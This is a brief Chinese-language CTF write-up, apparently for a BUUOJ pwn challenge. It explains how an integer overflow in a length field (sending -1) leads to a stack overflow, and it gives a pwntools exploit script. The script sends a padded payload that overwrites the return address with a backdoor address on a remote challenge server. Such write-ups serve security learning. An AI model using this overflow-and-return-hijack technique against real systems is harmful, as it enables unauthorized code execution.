?整數溢出漏洞??

將nbytes設置為-1就會回繞，變成超大整數 從而實現棧溢出漏洞

環境有問題

from pwn import *# 連接到遠程服務器
p = remote("node5.buuoj.cn", 28526)# 定義后門地址
backdoor = 0x400726# 發送初始輸入
p.sendlineafter(b"your name:", b'-1')# 構造溢出載荷
# 0x10 是緩沖區大小，8 是返回地址的偏移量
payload = b'a' * (0x10 + 8) + p64(backdoor)# 發送溢出載荷
p.sendlineafter(b"u name?", payload)# 進入交互模式
p.interactive()